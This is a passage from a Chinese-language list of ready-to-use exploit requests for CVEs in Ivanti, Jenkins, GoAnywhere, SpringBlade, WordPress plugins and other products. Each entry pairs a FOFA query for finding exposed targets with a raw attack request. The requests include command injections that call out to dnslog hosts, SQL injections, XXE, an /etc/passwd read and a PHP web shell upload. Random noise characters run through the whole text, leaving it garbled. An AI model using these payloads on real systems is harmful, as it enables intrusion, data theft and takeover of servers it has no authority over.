- m2 ?$ Z0 v- sAccept: */*1 K! Y( y2 F/ g+ x
Accept-Encoding: gzip, deflate
+ l: j' z q! k% ?5 B2 F* `4 ?+ {Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 Q% Z; q# ], }3 [: K& sContent-Type: application/x-www-form-urlencoded; charset=UTF-8. f% |+ N. Z6 U9 ^; S" N/ c U, z
X-Requested-With: XMLHttpRequest5 p- h: Q9 }/ _2 l' h
& F+ J7 K4 C. S- L* t3 ? K( A, C: mid=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B1 g- i- L. v) r" |" z1 Y0 g
: }3 G- M2 E8 q: Y1 T; W* K- n& h* d V* ]' v7 f/ P
99. Ncast盈可视高清智能录播系统busiFacade RCE% ]5 H: b) M# X0 r& ?
CVE-2024-0305
0 N3 H3 t( \, LFOFA:app="Ncast-产品" && title=="高清智能录播系统"
& S3 d: T7 N/ d% aPOST /classes/common/busiFacade.php HTTP/1.1
4 C' N$ {) v P$ ]% d8 _; p5 i: r! ^Host: 192.168.40.130:8080' t L8 \1 q, A. E4 ]4 w ^! M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0- }6 `' c" d- d: G7 |
Connection: close
( I0 H' p. B# E* mContent-Length: 154
4 f$ a( M- g/ j, K6 uAccept: */*
# K4 e) r4 e% a, SAccept-Encoding: gzip, deflate! M3 c6 `+ _8 O2 u
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" j4 o7 j6 N' A
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
* I9 O+ o4 M, [( ]8 pX-Requested-With: XMLHttpRequest
- _. X# ^0 ]/ i" N: v0 d" N* t6 h
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D+ U( w1 q: d% ?5 X: @
& v& t" g U4 j' O' M6 U$ o
: V1 h5 q0 u6 f8 b/ b100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传; z/ U+ Q9 M1 k8 y
CVE-2024-0352
" x- [* F! v) }/ bFOFA:icon_hash="874152924"
, O+ n7 ?# S! W' g* K/ P3 _% cPOST /api/file/formimage HTTP/1.16 x) ^( U" w4 w5 _8 B9 h* E, {8 O
Host: 192.168.40.130" t+ L1 F, X. A, n# U
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
* m6 U: D5 ]1 H! w/ h7 o, pConnection: close) \& n& J+ ?, ]# u9 m3 c P
Content-Length: 201: W$ C4 p, @# M+ ^' k( m2 N; _$ z) Q* ?
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
3 j% k) u5 j( O! kAccept-Encoding: gzip' m; P6 e# N) k" h& K
) H2 A7 ]1 l e7 i: Q------WebKitFormBoundarygcflwtei) Q- J: C, S' B
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
# h! k+ E0 q$ P2 j0 C. Z6 j" FContent-Type: application/x-php
; J+ d2 w. O0 a. B* ?( D% @; m9 P8 e+ ? T0 h
2ayyhRXiAsKXL8olvF5s4qqyI2O
4 m) G8 a. ?4 R8 F- ^------WebKitFormBoundarygcflwtei--
! m4 T, P. c" L+ t9 \
0 X. l; V; z6 x
1 N# X f) |$ k4 j/ D101. ivanti policy secure-22.6命令注入
2 ?4 |8 Q3 K D4 g1 kCVE-2024-21887
5 y l1 E0 X+ s% @1 u/ vFOFA:body="welcome.cgi?p=logo"
, c2 J0 N/ B0 [% T/ iGET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
2 A7 F+ T) V4 e3 nHost: x.x.x.xx.x.x.x
! o2 b) ?: ~) E2 S! l, m- MUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36# o" |! }4 d2 A$ G7 s
Connection: close
4 e7 b( \4 s0 s: CAccept-Encoding: gzip
6 ?4 o. D% I5 q6 x# C: x8 A; z/ r2 P3 x& X. \
' i* M5 \0 [5 V102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
6 i" p0 e! Q9 XCVE-2024-21893
. _0 F& S$ C! o/ c! W5 W4 j9 XFOFA:body="welcome.cgi?p=logo"
h: k1 y& T, T7 CPOST /dana-ws/saml20.ws HTTP/1.1
P9 v! r0 }4 ?4 z% T) G+ K/ nHost: x.x.x.x5 F7 ~2 Y( a$ O8 ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36' f: O( \6 w/ q6 L; M" T1 x
Connection: close$ w9 t" ?/ p6 f7 [* b _) Q
Content-Length: 7923 U, M8 H8 M) J s8 c: `
Accept-Encoding: gzip1 j" Z# w* B& g2 }$ }0 a
6 f$ F' A# X3 ]1 F
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
+ s2 T7 z7 a* ~6 Q* C
* U, Z& w# L' R% p% u# Z103. Ivanti Pulse Connect Secure VPN XXE
6 H1 M3 n+ g# A! N" s- S& M8 s# TCVE-2024-22024
- v5 }% n* l3 l7 I+ n% |FOFA:body="welcome.cgi?p=logo", p7 Y$ x. c' L' P$ n1 m
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
3 n, y4 Q) I2 j8 |) kHost: 192.168.40.130:111! S" r: z! n: u1 L& W
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.360 r& z1 V6 Z3 E' ?, l2 E
Connection: close
5 c# m6 |& K2 k+ M8 Z; fContent-Length: 2041 d4 e1 E9 a6 @, i' B$ ?
Content-Type: application/x-www-form-urlencoded
% Q) c2 @: R1 Z/ `0 r' PAccept-Encoding: gzip: X4 N$ K- s. p: N4 f! }1 k
: x( a$ i; T1 e( i) |. y
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
4 @' S5 J: A5 } ?* @" H
# r' u* S* e& e* U2 R* m: F _, a7 B: Y7 ^$ Q% w
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
{, @$ U( m1 B9 D<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
+ `+ Z, ]' l0 S7 Z4 A3 |( p+ C- }) L7 \( \- X6 ^% S
S6 ^# Q1 n3 S( U! w8 K7 @104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
( f% l" @' }' |$ N4 G/ LCVE-2024-05698 y0 F% x8 f8 F6 M! u. a- U
FOFA:title="TOTOLINK"
: O. J5 E l* M1 b5 z' G. uPOST /cgi-bin/cstecgi.cgi HTTP/1.1
9 x( O6 W0 Y8 \* q2 U+ d. CHost:192.168.0.1
* m7 F' @# I8 UContent-Length:41
+ @$ z0 D( \( ~- k$ iAccept:application/json,text/javascript,*/*;q=0.012 d4 M. _( j# p4 `) L! f
X-Requested-with: XMLHttpRequest
6 y7 L/ n$ i; ]% sUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36# X# R. z; c) ?
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
5 x6 {: [4 W* e/ e5 _9 GOrigin: http://192.168.0.16 q7 f, ?, g" F# P+ {# @4 ?; I
Referer: http://192.168.0.1/advance/index.html?time=16711523805646 v! o" ~3 L; `" s, ~$ R
Accept-Encoding:gzip,deflate, K6 z9 r) t8 I/ m% s& `# I
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
. _5 I. e' l2 [Connection:close
% C3 Z! w& j9 ?
4 w( H/ @0 M# L0 S s{7 P2 q2 q5 X5 f
"topicurl":"getSysStatusCfg",
. E0 b) R [ x4 V"token":""
) h6 p! u, s) W* W: z' h}
" H1 N- ?8 s& w: s( L4 L1 J5 g+ A. |
105. SpringBlade v3.2.0 export-user SQL 注入 @. h9 i+ J) h6 D: |
FOFA:body="https://bladex.vip"7 k. M# O8 j: f) T. [3 ^
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=19 Z, x& u) ?. g# q
. I' o7 K& `/ l106. SpringBlade dict-biz/list SQL 注入
: D h% K( u1 DFOFA:body="Saber 将不能正常工作"" J4 e8 M& G4 o5 J) K
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
m7 V" F4 D5 K& wHost: your-ip9 L6 h, e( T: c+ N t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36% r8 H R; T! H' j" [
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A4 f i4 V |6 D
Accept-Encoding: gzip, deflate
9 z& r6 c$ d( z3 Z$ U1 P) k+ [& p& ZAccept-Language: zh-CN,zh;q=0.9
- M4 y3 k, K7 r8 A% ~ u: b" \0 i9 G$ DConnection: close
7 m( v8 i- r0 i& \0 [
, s& i% v$ N* _- ?5 W
1 u* G. Q4 h' h" v107. SpringBlade tenant/list SQL 注入
+ q1 w9 _# K3 o H4 Q; zFOFA:body="https://bladex.vip"# `1 A- _% T1 n( j0 ^
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
( z. V8 G7 Z oHost: your-ip
2 h$ p$ S6 r7 ^) \; @9 UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.364 U8 L o: K- [. g# u
Blade-Auth:替换为自己的, U3 A1 |. V/ C9 z3 n# N7 w
Connection: close f4 F7 ^0 @3 S8 t2 q7 F
! k3 g9 `; s4 d: e3 \. t* r
$ g+ t6 U; c: o" E5 V
108. D-Tale 3.9.0 SSRF
( u7 ~3 ~2 a. v" H, _CVE-2024-21642
- g" _% Z- j ~4 y2 e8 \$ d, @FOFA:"dtale/static/images/favicon.png"
( ~! [5 a) J# i9 ~0 L( p, iGET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
& W1 f* E. q, }& t! bHost: your-ip
# q9 R. o y4 N4 M C6 @Accept: application/json, text/plain, */*
/ K N) k. X: Q! F2 \6 tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
& O# e4 B8 e, U6 G7 S/ LAccept-Encoding: gzip, deflate8 e% V" z. T& |# q) K2 r- s+ m
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
% U" ~# ]/ r9 o" b8 AConnection: close
$ X4 a, h8 q/ r$ f2 h/ R4 s' h; m% p+ ?, W; k8 Y, r' b
# A0 E; D W9 b; B8 S
109. Jenkins CLI 任意文件读取
4 q! K$ ?- u* V8 NCVE-2024-23897
* c7 H E" x4 n* Y8 C6 u$ `8 ZFOFA:header="X-Jenkins"/ ]0 x _6 C' |% Y# x3 V
POST /cli?remoting=false HTTP/1.14 b& C, c# E) X o% s& {
Host:; D) z/ e/ U( {2 i c, w( U+ m, H
Content-type: application/octet-stream- |, ]- O. |7 W E! {
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
! B' a/ \/ g D3 Y' p7 mSide: upload
. B# C; @: R3 w" L; H6 u3 rConnection: keep-alive% @7 a5 R8 [# c' L' V3 z# Q
Content-Length: 163. Y( p" M) ^1 |( D0 L z& _
; T+ z$ c" a3 ]! o2 R7 u/ ]b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
8 `1 s' `2 @, }- T1 J. b) ^7 e4 ]$ i+ d7 S& ?
. k/ @( s% _) ~& }# o
POST /cli?remoting=false HTTP/1.1) U3 H" n6 B- y9 P/ `% S
Host:& b& e. }) e* ~* E7 Z& }8 N
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
. u$ ?: k! c: P# E0 l! r$ k" wdownload) _3 D1 E" _+ d. Z4 S7 ^( R) e! L1 h. l
Content-Type: application/x-www-form-urlencoded* v2 y0 Z1 o" W# D/ M* ?
Content-Length: 0
- p# G4 Z. f X7 {/ r ^! s# ?/ \% B( V$ P' d) S3 w
, D; s; _" ], f6 g' eERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
$ _( ~ _# r2 Z* Qjava -jar jenkins-cli.jar help6 J' g7 ^3 s" q* o& e1 E8 Z. K" |
[COMMAND]; m% Y# ^3 N# N3 d
Lists all the available commands or a detailed description of single command.* ?$ e! }* d+ d& j
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)" s. {! s) m2 W9 i
8 v U1 ^/ M# I' o; M( E5 j# w# v: M8 ]. ?8 p0 a$ q: f& \" U- f
110. Goanywhere MFT 未授权创建管理员/ Z/ H. G2 q7 c' D4 m6 V' y5 W
CVE-2024-0204
2 d2 ^4 N! C- p: t, k TFOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"# M' Q+ ]- ?% Q) b3 a2 ]
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1' y f: k" N1 T1 L. N7 p
Host: 192.168.40.130:8000
: C8 F2 X4 H' ~) ~User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36) N6 I1 I4 r- a2 T' w* C
Connection: close
, v1 v+ V& w* k2 F' Q+ SAccept: */*
9 \6 h4 E# J. |/ |2 V) _Accept-Language: en+ ~5 ^7 D( R: G; m! H8 b
Accept-Encoding: gzip
1 K( |7 _5 {- u
7 G4 H3 a2 J) y; K3 M
0 n# O J4 ]6 H+ x111. WordPress Plugin HTML5 Video Player SQL注入+ y9 k$ G0 }8 u$ C; ]1 I4 j
CVE-2024-1061
% Z6 e0 O N$ z/ p2 ~. c4 F- cFOFA:"wordpress" && body="html5-video-player"9 s. \( H' s& b) D4 Z
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.17 ]* K9 d Z8 J1 v: u* d0 Q' I) i- Y
Host: 192.168.40.130:112
& u/ Z& t( R$ o/ ]! c: c2 b7 `User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
& s# Q: x' K5 qConnection: close
5 w* ^" t- P: [) wAccept: */*
* c& e/ ?& S& }) ~2 r% [6 d6 S2 bAccept-Language: en; W* z" }+ J( `) {
Accept-Encoding: gzip* W! l# M& j, h) x2 m9 X' N
/ ]+ G% V& n3 O( m q6 \4 ?% K$ ^
8 ]' h/ J9 O8 \112. WordPress Plugin NotificationX SQL 注入
: F* P, N# l! k. W4 x3 hCVE-2024-16980 O6 J* j% g! p$ I2 b& N3 d
FOFA:body="/wp-content/plugins/notificationx"+ P" @" f( q9 l- d7 V
POST /wp-json/notificationx/v1/analytics HTTP/1.1
: @' ], }: p' o& Q9 FHost: {{Hostname}}2 c+ Y% H5 L0 E
Content-Type: application/json" g0 L0 C' z! V9 O1 n! ~( Y1 ^
5 }" e' ]% d$ s
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}% F9 l L& E/ h) O$ o) s8 s
0 x* G, U! C) K7 w
6 g+ s2 |) c, ~113. WordPress Automatic 插件任意文件下载和SSRF: ^2 [1 n, ?4 \! G y7 X, k' B3 B: j
CVE-2024-27954
0 _5 z9 G5 ~* q2 R& l$ g$ H3 Y+ S& `FOFA:"/wp-content/plugins/wp-automatic"; [+ I+ I7 W- o5 Q# U! B- c
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
) u2 i' C( z0 p8 E$ h2 ~1 EHost: x.x.x.x
( c; J/ B8 K4 z; u+ }- pUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
9 t x+ t6 v0 y6 {4 w$ V0 }9 qConnection: close
; r/ X$ ?3 z/ T& d0 eAccept: */*
/ j' c& p7 f O+ R. |Accept-Language: en% A( k, @& R) S
Accept-Encoding: gzip8 _. q3 Z! G$ h8 y3 y7 `
" u& ~- q5 x+ u4 j( s
# `" b/ Z" [& Q+ [114. WordPress MasterStudy LMS插件 SQL注入
0 d1 U% T: ]* Q, _0 c% ] uFOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"- }$ M4 C" o' A; x3 _% ^
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
3 s, H* N* H- t3 j$ W2 U: b# sHost: your-ip' O- I2 u& L2 F: H/ ~2 H
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
: | y/ `$ S, d4 D, Y" `Accept-Charset: utf-8
+ X/ R2 R6 I: c+ h. _( m6 ^Accept-Encoding: gzip, deflate3 G! h! l/ ~' ]+ J! l' Q3 \! T8 E
Connection: close
, T" H: [2 i# @& o, a' y5 Y
, s" S a4 y. P
: P; B2 ~! O2 `" H115. WordPress Bricks Builder <= 1.9.6 RCE
3 Z f' P0 c+ t1 KCVE-2024-256005 ` \4 Z, a: @, R1 E
FOFA: body="/wp-content/themes/bricks/"
) _1 p# }9 H7 j) R; I& h第一步,获取网站的nonce值 j7 S- |, g& q* p. g
GET / HTTP/1.10 Z* U, m$ l3 G- w, s% {0 l
Host: x.x.x.x
1 E1 ~ a& Z" f& I% \5 @; {3 k" HUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36$ K# I" v! X K) x
Connection: close1 V/ q8 P" I2 j/ K' N. @
Accept-Encoding: gzip6 V% z; W" O" ~0 [( G9 S: v
& R8 I0 h0 \0 x# A/ _2 E6 M! v* M
0 _6 S( ~: t& I9 l* G# n
第二步替换nonce值,执行命令
- @: \8 a2 W9 p% {POST /wp-json/bricks/v1/render_element HTTP/1.1. s& `2 y3 J) @" }9 S$ z
Host: x.x.x.x% ]( L; A. v' h2 W9 d0 m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36, E7 J t/ t0 Q1 D
Connection: close
8 V3 M6 {0 s; N1 G% JContent-Length: 356
" Q! q# o5 h4 ]3 @1 T( O' bContent-Type: application/json
3 ]2 X+ o8 ?/ h; |( hAccept-Encoding: gzip/ U/ T: Z+ G- a* D1 i
+ s1 ~8 f" ]7 E& z$ T; h
{' t+ [) L- T* `! C7 [) A
"postId": "1",* ~$ t4 X4 F8 k0 R! K' j- \8 ~6 L
"nonce": "第一步获得的值",
1 S# D6 G5 ]5 {9 K "element": {/ V- ]) g1 d) A) I
"name": "container",
$ B0 q/ g$ Q1 y) k9 L" M! H "settings": {' X, M; A1 I; o/ e5 p, B
"hasLoop": "true",
. P. s* z: H" Z& Z) s: ? "query": {
0 A/ u% M w$ o/ F, K$ V "useQueryEditor": true,
8 r1 x' g" ~- {3 U "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",5 R- l( l& Y3 Y& _
"objectType": "post"
, R8 A( X2 \' F* R0 n" h* g% O }& H: c/ b" o5 @6 F7 K7 E
}
: \% z& y' e' W# q( a3 J }
5 J) R% U) `( t}
( m ?: r% @ F" Q2 U- k# l/ m' i0 Z5 l
- G( T+ _ Y% d1 q1 c+ |8 W
116. wordpress js-support-ticket文件上传
" X4 Q0 n3 y& M5 H9 M) o# `* i( z2 j2 sFOFA:body="wp-content/plugins/js-support-ticket"- S) g+ \5 V3 z. _" B+ e* f
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1$ `5 V$ @+ M' K4 L, o
Host: P# |+ v0 b# [' W' r) T
Content-Type: multipart/form-data; boundary=--------767099171
0 z3 X V3 n3 aUser-Agent: Mozilla/5.0* ?1 ~, @+ D' {) R }6 V. z
' H: b( d& [6 E9 |5 F3 |* W----------767099171
% v8 V# x% b* O, }1 C0 uContent-Disposition: form-data; name="action"
8 I3 Z/ o+ k( {configuration_saveconfiguration
) D) S# b0 [( k# W# x: q* G----------767099171
+ i3 g* _7 [& C) ]7 m6 tContent-Disposition: form-data; name="form_request"% s. `! [& F& [2 ^
jssupportticket; Y1 m5 V% K, r# L3 B! `" ]
----------767099171& e7 s- f; N5 o8 ~8 a. z4 i
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"2 b4 E0 L- b% a3 q/ F) P
Content-Type: image/png
4 v* r4 n- a4 d----------767099171--
5 ~ I/ X/ l! u h% x o( D
W" g4 ^- b$ L
( G6 ]) G4 F/ Q9 z117. WordPress LayerSlider插件SQL注入2 M/ G1 m0 I0 B' g' E* ^8 z
version:7.9.11 – 7.10.0
" t; ?& C N# C6 Q3 @FOFA:body="/wp-content/plugins/LayerSlider/"
/ L0 W$ \( l( @; l Z, U$ Q6 RGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
# S3 d/ M& {# L# T* B2 x }8 IHost: your-ip" n& S8 x. v( ]6 V- J- \7 z% B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
& P8 \ Y- I$ ?$ k$ w9 ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8$ z1 o! B1 A2 [+ h( _3 Y0 C! ^
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' C: e X7 M7 D1 F# @
Accept-Encoding: gzip, deflate, br
5 ]5 a8 g* V$ v' `6 ^# x8 [Connection: close, @# N) L1 e3 k
Upgrade-Insecure-Requests: 17 O0 Z" {9 Z1 \% Y& p
. Y1 u5 J' `4 K3 C& r9 I" o# i2 @
% a0 P- y' I$ \# B7 N1 _3 Q
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传0 X! h; ~& b" \8 D" ]6 G+ Y* m
CVE-2024-0939. X- [8 S% H. w- Z4 l% ]
FOFA:title="Smart管理平台"
+ j4 H: ]- z9 U; wPOST /Tool/uploadfile.php? HTTP/1.1
$ U' ~9 l& R/ J" Y& Y1 n kHost: 192.168.40.130:84435 {* ]- [/ Y7 \4 n* f/ f; @
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
?( u9 t% F# s+ cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0$ x9 E& o- S* q1 t
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
1 `2 g% k: y( G* ~4 L" JAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 X& m, J) ]7 s- [Accept-Encoding: gzip, deflate# x1 l# {, ~8 ~1 E
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
# a% i; x6 y# K& Z9 p, D! N8 vContent-Length: 405$ n) N$ w, @6 H% y
Origin: https://192.168.40.130:8443- d2 _( @+ Y* e h3 L7 b9 V5 ?
Referer: https://192.168.40.130:8443/Tool/uploadfile.php" J# Q7 }$ L: _1 L0 k
Upgrade-Insecure-Requests: 1
$ g" D) g- v8 {2 fSec-Fetch-Dest: document1 j; `4 D; Y/ b% I& O- \8 y
Sec-Fetch-Mode: navigate
# u( N; k0 v, ?# q8 s/ X/ tSec-Fetch-Site: same-origin
- i$ H" F) j* ~) N2 B6 wSec-Fetch-User: ?1
: S$ Q& V" t, p/ X$ `! n- P7 G( RTe: trailers7 }+ U. f& q" h3 D" q# X& u. s
Connection: close
3 w3 i, m) a" K9 A* x% |& S& i! [" [! w) r
-----------------------------13979701222747646634037182887
' R6 |+ B% ~" r, g: [- XContent-Disposition: form-data; name="file_upload"; filename="contents.php"3 N( o2 ?5 T" ^+ [
Content-Type: application/octet-stream
. f/ n$ }) I8 g! ?
! t2 D1 x9 W; W2 T9 o8 W<?php" i9 F6 h2 a1 t8 W: `% B5 n
system($_POST["passwd"]);, i# d# W7 l$ r$ f
?>
1 g9 [* }' e1 ~3 M-----------------------------13979701222747646634037182887
6 [% D6 X- z' H) A) TContent-Disposition: form-data; name="txt_path"2 h& d) e: H; M. d, X/ h9 P1 O
1 g5 l' p" c7 m1 H7 V9 M2 J2 y8 z s/home/src.php6 M) J# O! ^6 m- f
-----------------------------13979701222747646634037182887--
* g+ D# H5 F d( R+ [0 R2 ]0 w) N( ^% p3 V/ U: |% |% F
1 ]9 {, e1 D% X; f6 M4 A' \$ ^, O" B访问/home/src.php
8 |& |! `0 y) S* x: F% r0 ^' X. V
+ r& b) ]3 W9 O: `8 s" u! Q b119. 北京百绰智能S20后台sysmanageajax.php sql注入
/ J8 P0 v$ p# _3 d% S8 xCVE-2024-12546 e* ^# d3 K x
FOFA:title="Smart管理平台"
5 q9 x$ P9 |. P5 a' a1 S先登录进入系统,默认账号密码为admin/admin
9 V' x, [! T L& `7 ~POST /sysmanage/sysmanageajax.php HTTP/1.11
3 n7 Y4 x8 d/ K/ h) VHost: x.x.x.x$ K1 m7 R( Q% M' \& {2 v
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee" g* p: @+ @+ X. {* B0 X0 _& x4 o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0* L% }) ]$ r. B
Accept: */*
$ I l @5 [5 pAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( T4 j% Q+ l+ y/ i
Accept-Encoding: gzip, deflate
% k& N& P# }. O2 q& h. r+ j' ^4 {Content-Type: application/x-www-form-urlencoded;4 [# B0 x- D0 w2 R; K5 {! s
Content-Length: 109
6 v5 N4 Q5 x+ ^8 P$ A! vOrigin: https://58.18.133.60:8443' O0 {$ K* s& O- B8 n
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
5 a* Z' [8 X4 q O KSec-Fetch-Dest: empty" N8 [3 }4 ], o# [7 u; @
Sec-Fetch-Mode: cors. A h) T- z% J5 C0 H
Sec-Fetch-Site: same-origin2 O4 c" T* S7 ^% n, J7 y, j
X-Forwarded-For: 1.1.1.1
